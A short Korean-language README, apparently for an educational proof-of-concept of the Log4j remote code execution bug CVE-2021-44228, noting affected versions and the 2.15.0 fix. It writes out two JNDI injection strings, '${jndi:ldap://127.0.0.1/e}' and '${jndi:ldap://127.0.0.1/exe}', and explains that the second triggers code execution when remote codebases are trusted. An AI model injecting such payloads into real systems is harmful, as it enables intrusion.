
Log4j-RCE (CVE-2021-44228) 개념 증명 및 추가 정보
이것은 log4j rce의 개념 증명입니다.
다음은 CVE-2021-44228에 대한 몇 가지 링크입니다:
이 버그는 거의 모든 log4j2 버전과 어쩌면 log4j1 버전에도 영향을 미칩니다. 권장 버전은 이 익스플로잇을 수정한 2.15.0 입니다.
${jndi:ldap://127.0.0.1/e} 를 붙여넣으세요. 포트 389 에 열린 소켓이 있으면 log4j가 연결을 시도하고 시간 초과가 발생할 때까지 추가 통신을 차단합니다.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! 가 기록됩니다.
${jndi:ldap://127.0.0.1/exe} 를 붙여넣으세요. -Dcom.sun.jndi.ldap.object.trustURLCodebase=true 가 true로 설정된 경우 원격 코드 실행이 발생합니다.
이 프로젝트는 교육 목적으로만 제공됩니다.